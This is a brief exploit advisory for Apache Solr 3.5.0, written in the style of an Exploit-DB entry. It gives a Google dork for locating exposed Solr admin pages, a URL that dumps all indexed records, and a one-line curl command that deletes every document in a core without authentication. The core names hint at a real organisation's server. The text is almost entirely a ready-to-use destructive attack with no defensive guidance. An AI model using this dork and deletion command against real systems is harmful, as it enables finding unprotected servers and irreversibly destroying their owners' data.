# ExploitTitle:AllSolrDataCanBeDelete
# GoogleDork: intext:[Schema][Config][Analysis][SchemaBrowser][Statistics][Info][Distribution][Ping][Logging]
# Date:5/2/2016
# ExploitAuthor:N37[Myanmar]
# VendorHomepage: http://lucene.apache.org/solr/
# SoftwareLink:https://archive.apache.org/dist/lucene/solr/3.5.0/
# Version:3.5.0
# Tested on: fedora 23Solr isopen source enterprise search platform built on ApacheLucene.
It can be delete all data in solr. solr are use nlp, money of data research, data mining,some of mobile backend on vps .POC or Eg.
ThisQuery is shwo all data in solr :
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on
You can delete all data withcurl in terminal :
curl -XGET"server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"
now you can check withfirst query in browser. All data are deleted.
Regards,N37[Myanmar]